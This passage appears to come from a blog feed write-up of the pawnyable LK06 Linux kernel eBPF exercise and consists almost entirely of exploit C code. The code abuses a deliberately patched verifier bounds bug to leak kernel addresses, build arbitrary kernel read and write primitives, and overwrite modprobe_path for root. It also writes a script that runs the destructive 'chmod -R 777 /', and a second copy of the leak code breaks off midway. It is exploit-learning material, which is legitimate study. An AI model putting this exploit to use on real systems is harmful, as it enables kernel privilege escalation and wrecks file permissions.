  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
